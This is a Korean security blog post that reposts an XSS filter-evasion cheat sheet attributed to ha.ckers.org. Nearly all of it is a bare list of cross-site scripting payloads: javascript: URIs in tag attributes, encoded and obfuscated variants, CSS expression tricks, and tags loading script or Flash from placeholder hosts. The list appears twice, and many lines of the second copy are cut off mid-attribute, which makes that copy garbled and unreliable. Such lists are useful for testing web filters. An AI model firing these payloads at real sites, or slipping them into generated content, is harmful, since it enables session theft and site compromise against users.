출처 : http://blog.naver.com/PostView.nhn?blogId=skyeun4&logNo=119539148
출처2 : http://ha.ckers.org/xss.html
<SCRIPT SRC=http://xxx/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@import'http://xxx/xss.css';</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF=http://xxx/xss.css>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<EMBED SRC=http://xxxx/xss.swf AllowScriptAccess="always"></EMBED>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
><script>alert(xss)</script>
출처2 : http://ha.ckers.org/xss.html
<SCRIPT SRC=http://xxx/xss.js></SCRIPT>
<IMG SRC="javascript
<IMG SRC=javascript
<IMG SRC=JaVaScRiPt
<IMG SRC=javascript
<IMG SRC=`javascript
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript
<IMG SRC="javascript
<IMG DYNSRC="javascript
<IMG LOWSRC="javascript
<IMG SRC='vbscript
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript
<BODY BACKGROUND="javascript
<BODY ONLOAD=alert('XSS')>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript
<IFRAME SRC="javascript
<FRAMESET><FRAME SRC="javascript
<TABLE BACKGROUND="javascript
<TABLE><TD BACKGROUND="javascript
<DIV STYLE="background-image: url(javascript
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074
<DIV STYLE="background-image: url(javascript
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@import'http://xxx/xss.css';</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript
<STYLE type="text/css">BODY{background:url("javascript
<LINK REL="stylesheet" HREF="javascript
<LINK REL="stylesheet" HREF=http://xxx/xss.css>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript
<EMBED SRC=http://xxxx/xss.swf AllowScriptAccess="always"></EMBED>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
><script>alert(xss)</script>
'Secure Note' 카테고리의 다른 글
forensics ref site (0) | 2012.06.25 |
---|---|
paros scan (0) | 2012.04.16 |
free web proxy site (0) | 2012.03.07 |
md5 (0) | 2011.11.05 |
레지스트리 보기(1) (0) | 2011.11.05 |